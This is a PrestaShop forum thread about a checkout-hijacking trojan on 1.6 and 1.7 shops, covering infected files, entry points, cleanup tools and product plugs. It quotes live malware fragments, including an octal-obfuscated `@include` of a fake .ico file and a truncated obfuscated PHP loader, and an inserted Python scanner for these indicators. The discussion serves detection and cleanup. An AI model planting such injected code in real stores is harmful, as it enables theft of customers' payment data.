Prestashop 1.6 trojan. New method


Prescol

I spent 6 hours finding the files modified by this trojan, which replaces the checkout process with its own content to steal credit card or PayPal accounts. So, in order to save you more hours of research, here are some tips to find it.

The attacker injects code into smarty_cacheresource.php. This code, which is obfuscated in a way only a Russian government can do, creates a fake Smarty class called smarty_internal_validation, which you will never be able to see because it is created on the fly and PHP is instructed to know how to use it.
Then, a subtle modification is added to the smarty_internal_data::assign() method. The following line is added before assigning a variable.

$tpl_var = Smarty_Internal_Validate::Validate($tpl_var);

It looks like it is part of the PrestaShop environment, but it is not. This call injects malicious JavaScript into $hook_header, which is responsible for replacing the original payment button with the fake one.

I found the same behavior recently in another shop, but the way they injected the code was much simpler, by decoding a file containing malicious JavaScript within a tpl.

Hope it helps you if you are in the same situation. For me it was a pain in the ass spending half a day searching for it.

I went through the same injection today; it infects a lot of files, but I don't know how to prevent being infected. To correct your Presta it helps to copy original files over infected ones.

Infected files:

  • controllers\front\IndexController.php
  • modules\bankwire\controllers\front\validation.php
  • tools\smarty\sysplugins\smarty_cacheresource.php
  • tools\smarty\sysplugins\smarty_internal_data.php
  • cache\tcpdf\index.php

  • 2 weeks later...
On 1/12/2023 at 5:07 PM, Prescol said:

I spent 6 hours finding the files modified by this trojan, which replaces the checkout process with its own content to steal credit card or PayPal accounts. So, in order to save you more hours of research, here are some tips to find it.

The attacker injects code into smarty_cacheresource.php. This code, which is obfuscated in a way only a Russian government can do, creates a fake Smarty class called smarty_internal_validation, which you will never be able to see because it is created on the fly and PHP is instructed to know how to use it.
Then, a subtle modification is added to the smarty_internal_data::assign() method. The following line is added before assigning a variable.

$tpl_var = Smarty_Internal_Validate::Validate($tpl_var);

It looks like it is part of the PrestaShop environment, but it is not. This call injects malicious JavaScript into $hook_header, which is responsible for replacing the original payment button with the fake one.

I found the same behavior recently in another shop, but the way they injected the code was much simpler, by decoding a file containing malicious JavaScript within a tpl.

Hope it helps you if you are in the same situation. For me it was a pain in the ass spending half a day searching for it.

 

I migrated to 1.7 because of this trojan

IDK what's worse..


f**k. me.

 

so what does your "cleaner" do? overwrites the core modified files?

has anyone found the point of entry of this hack?

 

I thought it was either the outdated PHP version I was running (5.6) or the PS installation (1.6)

now I'm on PHP 7.4 and PS 1.7, please tell me I'm OK or I'll kill myself XD


Cleaner scans and informs you if core files have been modified, if known infections have been added, blocks certain malicious codes, destroys known added files.

The infection comes either from a badly secured third-party module, or from another CMS installed on the same hosting (WordPress not up to date or other)

The PHP version has nothing to do with the hack.

 

The 1.6.2 version will be so cool ;)


It is a planned attack backed by an institution, not someone in his house. Bad times are coming for maintenance, since each time a PrestaShop store is attacked it is done with zero-day exploits, meaning they were kept secret until today.


on clean shop this module will tell you when files have been modified, size/time/group/owner.

  • commit trusted change
  • restore untrusted change from built in vault

not one bug fix required since written for ps 1.4

also allows one to monitor what files your developer may have changed, priceless

https://www.addons.prestaheroes.com/collections/all-modules/products/prestavault-malware-trojan-virus-protection?variant=40653346603215

 


Had my own fight with this today and would like to share my findings.

I cleaned the changes mentioned in the tools -> smarty folder, but without finding out how it was done. Later today the changes were back.

After searching the access logs I found that 2 files in classes were changed: Tools.php and Dispatcher.php

These changes allowed the intruder to call ini.php through POST and it would create this file in the root.

It was the plugin TMSocialLogin that was used as a way in.

This was on Prestashop 1.6


2 minutes ago, nsordk said:

Had my own fight with this today and would like to share my findings.

I cleaned the changes mentioned in the tools -> smarty folder, but without finding out how it was done. Later today the changes were back.

After searching the access logs I found that 2 files in classes were changed: Tools.php and Dispatcher.php

These changes allowed the intruder to call ini.php through POST and it would create this file in the root.

It was the plugin TMSocialLogin that was used as a way in.

This was on Prestashop 1.6

Cleaner detects this^^

https://shop.devcustom.net/fr/content/16-nettoyage-hack


On 2/6/2023 at 6:11 PM, PrestaHeroes.com said:

on clean shop this module will tell you when files have been modified, size/time/group/owner.

  • commit trusted change
  • restore untrusted change from built in vault

not one bug fix required since written for ps 1.4

also allows one to monitor what files your developer may have changed, priceless

https://www.addons.prestaheroes.com/collections/all-modules/products/prestavault-malware-trojan-virus-protection?variant=40653346603215

 

this will detect and you can restore.

if you manually detect and 'fix', set the leak files to read only.

also upgrade from 1.6 to latest 1.7.....get rid of old leaky modules...


12 hours ago, Fred PrestaHeroes said:

also upgrade from 1.6 to latest 1.7.....get rid of old leaky modules...

Lol

last infections detected on 1.7.8 version

/*b3b2b*/

@include ("\057home\057vgd/\167ww/x\147xxx\056xx/m\157dule\163/ps_\163earc\150bar/\056f269\0645b1.\151co");

/*b3b2b*/

fake ico file infected : /home/vgd/www/xxxxxx/modules/ps_searchbar/.f26945b1.ico
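
The indicators reported in this thread (the `Smarty_Internal_Validate` call, an `@include` whose path is hidden behind octal escapes, and PHP stored in a fake `.ico`) can be searched for with a small read-only scanner. This is an added example, not part of any post and not the code of cleaner.php or of any module mentioned here; the function names and the sample file are constructed for illustration.

```python
import os
import re
import sys

# Indicator from the first post: a call to a class that is not part of Smarty.
# PHP class names are case-insensitive, and the post uses both spellings.
SMARTY_CALL = re.compile(r"Smarty_Internal_Validat(?:e|ion)\s*::", re.I)
# include/require with a double-quoted path (only double quotes expand escapes).
INCLUDE = re.compile(
    r'\b(?:include|require)(?:_once)?\s*\(?\s*"(?P<path>(?:\\.|[^"\\])*)"', re.I)
# PHP octal (\057) and hex (\x2f) escapes inside double-quoted strings.
ESCAPE = re.compile(r"\\([0-7]{1,3})|\\x([0-9A-Fa-f]{1,2})")
IMAGE_EXT = {".ico", ".png", ".jpg", ".jpeg", ".gif"}
PHP_EXT = {".php", ".tpl"}


def decode_php_escapes(s):
    """Decode octal/hex escapes the way PHP does in a double-quoted string."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 8) & 0xFF)
        return chr(int(m.group(2), 16))
    return ESCAPE.sub(repl, s)


def scan_php_source(text):
    """Return a list of (line_number, kind, detail) for one PHP source text."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        if SMARTY_CALL.search(line):
            findings.append((no, "smarty-validate-call", line.strip()))
        for m in INCLUDE.finditer(line):
            raw = m.group("path")
            if ESCAPE.search(raw):  # a plain readable path is not reported
                findings.append((no, "escaped-include", decode_php_escapes(raw)))
    return findings


def scan_file(path):
    """Scan one file; image extensions are only checked for embedded PHP."""
    ext = os.path.splitext(path)[1].lower()
    if ext not in IMAGE_EXT and ext not in PHP_EXT:
        return []
    with open(path, "rb") as fh:
        data = fh.read()
    if ext in IMAGE_EXT:
        if b"<?php" in data.lower():
            return [(1, "php-in-image", os.path.basename(path))]
        return []
    return scan_php_source(data.decode("utf-8", "replace"))


def scan_tree(root):
    """Walk a shop directory (hidden files included) and collect findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            found = scan_file(full)
            if found:
                report[os.path.relpath(full, root)] = found
    return report


# Constructed sample: the include line is the one quoted in the post above,
# the last line is the one quoted in the first post.
SAMPLE = r'''<?php
/*b3b2b*/
@include ("\057home\057vgd/\167ww/x\147xxx\056xx/m\157dule\163/ps_\163earc\150bar/\056f269\0645b1.\151co");
/*b3b2b*/
require_once(dirname(__FILE__) . '/config.php');
$tpl_var = Smarty_Internal_Validate::Validate($tpl_var);
'''

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for rel, found in sorted(scan_tree(sys.argv[1]).items()):
            for no, kind, detail in found:
                print(f"{rel}:{no}: {kind}: {detail}")
    else:
        for no, kind, detail in scan_php_source(SAMPLE):
            print(f"sample:{no}: {kind}: {detail}")
```

Run it with the shop root as the only argument, ideally against an offline copy; it only reads files and reports, so each hit still has to be compared with the original file of the same PrestaShop version.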


11 hours ago, Eolia said:

Lol

last infections detected on 1.7.8 version



@include ("\057home\057vgd/\167ww/x\147xxx\056xx/m\157dule\163/ps_\163earc\150bar/\056f269\0645b1.\151co");

fake ico file infected : /home/vgd/www/xxxxxx/modules/ps_searchbar/.f26945b1.ico

Oh, so you think all ps are hacked? I think it's more when people use free mods which i defended to have removed from the forum....also 1.7.5 and earlier ps did dirty they create mod folder with 777 during installation. I caught them once years ago and they took it away...but it's back...

we do a lot of different stores and many customers over the years the number of people hacked was zero. We are getting new customers who are currently being hacked, one selling balls in the US for over 1,000,000 a month...the hack sent all customer info and cc info. Amazing..

Anyway, I "know" I wrote the best detect/restore module for "any" cms after my 1.4 module store was hacked, I was pissed loool.

we also have a plesk extension that does what ImunifyAV does but also has rollback...among other things.

cybersecurity is like porn, but you have to pay for it. it's me

I also have a module that analyzes ps permissions, we thought of releasing it for free but it provides information for hackers to attack....amazing.

using google translate, why do we even have separate forums, today's browser translations work fine...

Have a good weekend


I'm just saying that the PS version has nothing to do with it.

For a hack to take place there are not 36 solutions:

- Theft of FTP credentials

- Unsecured module with upload functions

- Other unsecured CMS on the same hosting (8 obsolete WPs lately have infected PS)

Prestashop, since versions 1.2 has always controlled uploads and has never allowed direct access to these directories.

Regarding the rights, once a module is installed, regardless of whether it is 777, 755 or other, PHP can run create modify directories.


If you speak in English in this channel, everyone could know what you are talking about and the information will be useful for all, despite this message being posted in the English channel.

Please @Eolia and fred, I'm appealing to your experience in the forum, update your messages with an English version.


@Eolia I don't understand the trojan new method at all in this post.
"The attacker injects a code into smarty_cacheresource.php" This is a default file in PrestaShop right?
How is this trojan injected as the owner of this post says? Or is it injected in that file through a module?


No, this smarty_cacheresource.php story could only allow a possible reading of the database by XSS injection and ONLY in case you have activated MySQL caching.
A patch has been proposed for all versions at this level.
Today's hacks have nothing to do with it and, FYI, have been around for a long time.

https://bb.enter-solutions.net/topic/1075/des-modules-et-des-hacks-liste-non-exhaustive-des-modules-présentant-un-risque/16


  • 1 month later...
On 1/27/2023 at 5:21 PM, Eolia said:

Use my cleaner.php this hack is detected ;)

https://devcustom.net/public/scripts/cleaner.zip

Open the zip
Take the cleaner.php file and place it at the root of your site
Then you call it with this url: https://yoursite.com/cleaner.php
 

I suggest you change the behavior of the script, so it doesn't delete, edit or replace files automatically.
A better approach would be to display all the errors and let the user decide if he wants to delete, edit or replace each error.


  • 4 weeks later...
14 hours ago, Boonyawat said:

Is there a way to prevent this?  I have a recent backup files so I decided to Restore my website. But I wonder how I can prevent this not happen again.

yes, upgrade to latest 1.7, remove all those disabled and free modules...

stop loading free modules, I don't know why PS allows unvetted free modules on forums.

very few hacks have been successful with 'addons' vetted modules.

then put on hosting that supports ImunifyAV....

 

if PS is not a hobby but serious business,  sitting on hands on old PS...that's on you, loading free unvetted modules...that is on PS and you

 

 


  • 1 month later...
On 4/10/2023 at 10:54 PM, PrestaHeroes USA said:

very few hacks have been successful with 'addons' vetted modules.

- sendtoafriend (native)
- paypal (native)
- all modules with php-unit ... eval-stdin.php (native & addons)
- attributewizardpro (addons)
- cartabandonmentpro (addons)
- ...

List contains numerous examples that contradict such statement.


5 hours ago, doekia said:

- sendtoafriend (native)
- paypal (native)
- all modules with php-unit ... eval-stdin.php (native & addons)
- attributewizardpro (addons)
- cartabandonmentpro (addons)
- ...

List contains numerous examples that contradict such statement.

well that is very few compared to the 1000's on there, at least they have to go through validation, so yes there are a few, I would think PS updated their validation to try to keep those things from happening, on the free modules, that does not happen...so your point falls on deaf ears


Very few ?

 


On 7/2/2023 at 12:11 AM, PrestaHeroes USA said:

on clean shop this module will tell you when files have been modified, size/time/group/owner.

  • commit trusted change
  • restore untrusted change from built in vault

not one bug fix required since written for ps 1.4

also allows one to monitor what files your developer may have changed, priceless

https://www.addons.prestaheroes.com/collections/all-modules/products/prestavault-malware-trojan-virus-protection?variant=40653346603215

 

Is it compatible with PS8 and PHP8.1?


3 hours ago, DARKF3D3 said:

Is it compatible with PS8 and PHP8.1?

I have just assigned someone to validate our modules on ps8, pv will be one of the first.  Will update here or via messenger.  Note: we have a plesk version of this module which has more features and can protect other/all domains defined to plesk....in case anyone interested.


  • 1 month later...
  • 4 months later...

Hi,

I have PS version 1.6.1.4; in March it was hacked and the card payment page was somehow redirected.
At that time I solved it with this: (link)
To do so, locate the file config/smarty.config.inc.php on your PrestaShop install, and remove lines 43-46 (PrestaShop 1.7) or 40-43 (PrestaShop 1.6):
if (Configuration::get('PS_SMARTY_CACHING_TYPE') == 'mysql') {
    include _PS_CLASS_DIR_.'Smarty/SmartyCacheResourceMysql.php';
    $smarty->caching_type = 'mysql';
}

Right now the JS/SpyBanker.IV trojan has been discovered again.

I see some files changed, for ex.
classes/shop/shop.php
classes/Store.php
etc.

has something like this at the end:
$r1e="d63LgMkA570XFPH2wSZiKncUjVoaCGOlExDW_s48ftYJ9NTyzBvmhIQpbeuRqr1";$w85=$r1e[40].$r1e[58].$r1e[21].$r1e[22].$r1e[41].$r1e[19].$r1e[26].$r1e[21].$r1e[36].$r1e[57].$r1e[33].$r1e[19].$r1e[37].$r1e[41].$r1e[37];$i17cd=$r1e[22].$r1e[61].$r1e[57].$r1e[27].$r1e[41].$r1e[57].$r1e[36].$r1e[40].$r1e[58].$r1e[21].$r1e[22].$r1e[41].$r1e[19].$r1e[2KCk7IAl9Owo='));@$x3e4e();}

I know that the upgrade is imminent, but right now I need to restart the shop ASAP, and right now I haven't found the right person.

My question: is the above solution with cleaner.zip OK for this old 1.6.1.4 version?

thank you

ron

 


1 hour ago, ronniee said:

I know that the upgrade is imminent, but right now I need to restart the shop ASAP, and right now I haven't found the right person.

This and further hacks will (most likely) increase. It should lead to a broader concept of shops. Do not only have one shop, have several, that way you can redirect visitors and it's highly unlikely that you hacked all versions. 

Those set ups need time to monitor. Businesses grow and so does their employee number. 

Search your log and access files you might get the perpetrator.  


  • 2 months later...
On 2/2/2023 at 11:55, Eolia said:

Lol

This trojan is also present in versions 1.7/8^^

Hi Eolia,

thank you for providing your cleaner.php which I used on one of my sites and discovered it was infected. I replaced all the files in red with the original files from the exact version of prestashop 1.6.1.20. This did not solve the initial problem that the generated pdf invoices are unreadable.. I attach img.

Since I have two domains with two different sites in the same Hosting space, I would like to check the second site too, which is made with prestashop 1.7.8.8

I tried to put the cleaner.php in different places, but if I put it in public_html it starts but I read in "cleaner" that there are two directories to close one or something like that, how can I make cleaner? also do you have any suggestion for the correct creation of pdf invoices, thanks

Have a nice day
Elio


22 hours ago, Eolia said:

delete your second admin.

How? delete your second admin.
But there is a site built in the second domain.

Or maybe there is a method I don't know, so I can control the second site, thanks


2 hours ago, micelio said:

Or maybe there is a method I don't know, so I can control the second site, thanks

Why don't you take the time and plan ahead, the 1.6 site you could convert into a eolia shop or Thirtybees. That way you have a fresh design, can clean the database and speed everything up.

To use 2 shops in the same hosting is not really prudent, I know most people act due to ease. But you become dependent. Dependency is not what you need in business. 

It costs you about €50 to 100 per year to use a 2nd hosting. The times where one shop conquered the world like Amazon are clearly over. Several shops raise chances in ranking over a broader spectrum and give you more security. Except if they infect your PC. 

If you wish for safety, use a Laptop to access shops and another to open emails.  


5 hours ago, Eolia said:

2 different Prestashop sites cannot have files in common.
Your second site must be in another directory.
A Prestashop site must only have one admin directory.

Do you know if there is a practical way to separate the two sites? Since they are both in the same hosting, they have folders in common.

The second domain is under construction, I could redo it and it is not a problem.

I would just like to save the site which is: www.micelimoto.com and I am fine with prestashop version 1.6.1.20

Thank you


Keep all your directories except the duplicate admin.


Then, create a new directory, at the same level as www (or public_html) and point your new domain name to this new directory.
Then, install your Prestashop (or PhenixSuite) in your new directory.


2 hours ago, Eolia said:

Keep all your directories except the duplicate admin.


Then, create a new directory, at the same level as www (or public_html) and point your new domain name to this new directory.
Then, install your Prestashop (or PhenixSuite) in your new directory.

I think I am not capable of doing what you tell me.

I can create in the same level as public_html a new directory (new folder) and name it after the name of the 2 domain, okay?

I don't know how to get my second domain to point to this new directory.

But won't all the existing shared directories of the two different versions of prestashop bother each other?

Could you help me with that? I would like to correct this situation I have in hosting. Create two completely separate sites in the same space, each with its own version of prestashop. Do you think this correction can be made? Thanks


Please, a long time ago, we had the mentioned hack on the site that added a fake payment module, but we removed the error. Well, almost a year later, we currently have the problem that our server is crashing because the website is arbitrarily sending us an awful lot of e-mails, and our server is overwhelmed and crashes. Backoffice totally unusable and cpanel slowed down. Can anyone tell me what it could be and how to remove it? Thank you very much
 


1 hour ago, Maxflor said:

and our server is overwhelmed and crashes.

Make a backup, export the database, clean everything up. Get a better server. While you're at it, change access to backend, databases.
In your shoes I would redo the entire shop.

 


Nickz 

how do you mean to redo the whole shop? I mainly need to remove the error that causes the problem with the meaningless sending of emails. The e-shop worked well for us before. Recently, they adjusted the purity of the codes on the e-shop and everything was ok. Can you give me a tip on the procedure, what would you do? How to find the problem as soon as possible and eliminate it? I wanted to connect Cloudflare to the website to speed it up a bit.

Thank you very much


33 minutes ago, Maxflor said:

Nickz 

how do you mean to redo the whole shop? I mainly need to remove the error that causes the problem with the meaningless sending of emails. The e-shop worked well for us before. Recently, they adjusted the purity of the codes on the e-shop and everything was ok. Can you give me a tip on the procedure, what would you do? How to find the problem as soon as possible and eliminate it? I wanted to connect Cloudflare to the website to speed it up a bit.

Thank you very much

Explain how to do in 2 minutes something that takes at least a day to do.

There are no secrets, no tricks to be passed on, just common sense, an analysis of all the files, of the entire structure, knowing the normal PrestaShop structure by heart saves time, but that's something you acquire over the long term, and I'm not even talking about intervening on a site that has never respected anything.

Everything has already been explained, sites reference all the security alerts, already posted several times, community modules allow you to identify vulnerabilities, already posted dozens of times, techniques have been explained, written in articles, to climb the first step of the staircase, but there's no secret, just work and knowledge.

You've got flaws, you haven't fixed them, and since your site has been hacked, it's going to be hacked every week by one or other technique, since it's now on the list of sites to be hacked.

The only way to do this is to clean up all the code in all the modules, one by one.


3 hours ago, Maxflor said:

Please, a long time ago, we had the mentioned hack on the site that added a fake payment module, but we removed the error. Well, almost a year later, we currently have the problem that our server is crashing because the website is arbitrarily sending us an awful lot of e-mails, and our server is overwhelmed and crashes. Backoffice totally unusable and cpanel slowed down. Can anyone tell me what it could be and how to remove it? Thank you very much
 

https://devcustom.net/public/scripts/cleaner.zip

Open the zip
Take the cleaner.php file and place it at the root of your site
Then you call it with this url: https://yoursite.com/cleaner.php


10 hours ago, Maxflor said:

 

how do you mean to redo the whole shop? I mainly need to remove the error that causes the problem with the meaningless sending of emails.

Redoing a shop removes every possible entrance to your shop.
Removing parts of code leaves the shop open to new hacks.

mails which are sent from your server mean you are hacked.


  • 2 weeks later...

Hi friend, I was attacked by a trojan some days ago.

I placed a backup on local and tried the cleaner.php

but it is not working well.

- It starts and checks for an upgrade

- it downloads the upgraded file ('3.1.9') and renames itself to an alphanumeric name

- but it gets stuck and doesn't start (I also tried to rename it again to cleaner.php, but it again says "telechargement de la dernier version.....")

- I'm now in a loop, because after "telechargement" it says "impossible to reach site"

Does anyone know if it is compatible with PS 1.6.1.7 and PHP 7? (the version I'm running)


  • 2 weeks later...

hi friends.

can help me, old prestashop 1.6 version with 3.2.1 cleaner have 500 internal server error.

i use old version cleaner script, this update after run, and i see change name this script and next - internal server error after seconds run script work. logs clear.

before cleaner started and work very fine, may be after script update this

500 Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator at to inform them of the time this error occurred, and the actions you performed just before this error.

More information about this error may be available in the server error log.


  • 4 weeks later...
15 hours ago, Nickz said:

look into the server-logs, many times here: var/log/apache2/errorlog

Hello, I have only these 2 rows:

 

[Wed Apr 17 08:48:45.882526 2024] [proxy_fcgi:error] [pid 734:tid 140236159960832] [client xxxxxx:33932] AH01067: Failed to read FastCGI header
[Wed Apr 17 08:48:45.882574 2024] [proxy_fcgi:error] [pid 734:tid 140236159960832] (104)Connection reset by peer: [client xxxxxx:33932] AH01075: Error dispatching request to :


Our FileStasis Attack Surface Monitor(ASM) + Restore for PrestaShop module will 1) build vault of mission critical files 2) monitor and report when file changes/additions/deletions are found, allows you to commit trusted change to vault or restore untrusted change from vault.

The most important part of detecting hack is knowing which files changed, that is the purpose of this module.

https://prestaheroes.com/products/prestavault-malware-trojan-virus-protection?variant=40653346635983

 


  • 4 months later...

Got one question, the cleaner is good, but I got one problem. When I make the scan to bigger files it detects

Fichier dangereux supprimé (shell_exec) => web/modules/securitypro/securitypro.phpVoir

and deleted it. But this is the security plugin, that has of course a lot of rights, this shouldn't be deleted. How can I prevent it from doing that?


shell_exec is a very big risk on a php script, besides many hosts block this function.

Cleaner doesn't create any folder, only zip files with detected files.

If you are happy with your security pro, why use cleaner?
